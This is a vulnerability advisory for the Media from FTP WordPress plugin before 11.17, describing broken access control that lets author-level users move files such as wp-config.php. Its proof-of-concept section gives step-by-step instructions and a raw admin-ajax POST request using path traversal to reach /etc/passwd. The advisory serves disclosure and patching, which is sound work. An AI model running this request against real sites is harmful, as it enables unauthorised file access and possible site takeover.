Media from FTP < 11.17 – Author+ Arbitrary File Access | Plugin Vulnerabilities

Description

The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.

In 11.16, the manage_options capability was used, however is still insufficient in case of MultiSite setups

Proof of Concept

1) Go to /wp-admin/admin.php?page=mediafromftp-search-register
2) Select any file from the media text list below
3) Click "Update Media"
4) Intercept request with action=mediafromftp-update-ajax-action
5) Change "new_url" by adding the following to the file path: /../../../../../../../../../../etc/passwd

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36

Affects Plugins

Fixed in 11.17

References

CVE

URL

https://blog.cleantalk.org/cve-2023-4019-media-from-ftp-11-17-author-arbitrary-file-access-via-path-traversal/

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

0d323b07-c6e7-4aba-85bc-64659ad0c85d

Timeline

Publicly Published

2023-08-14 (about 3 months ago)

Added

2023-08-14 (about 3 months ago)

Last Updated

2023-08-22 (about 3 months ago)

Other

Published

Title

Published

2023-03-10

Title

GiveWP < 2.25.2 - Contributor+ Arbitrary Content Deletion

Published

2023-10-12

Title

WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution

Published

2022-11-21

Title

StopBadBots < 7.24 - Subscriber+ Arbitrary Plugin Installation

Published

2023-05-23

Title

Go Pricing - WordPress Responsive Pricing Tables <= 3.3.19 - Incorrect Authorization leading to Arbitrary File Upload

Published

2022-08-15

Title

Visual Portfolio < 2.19.0 - Contributor+ CSS Injection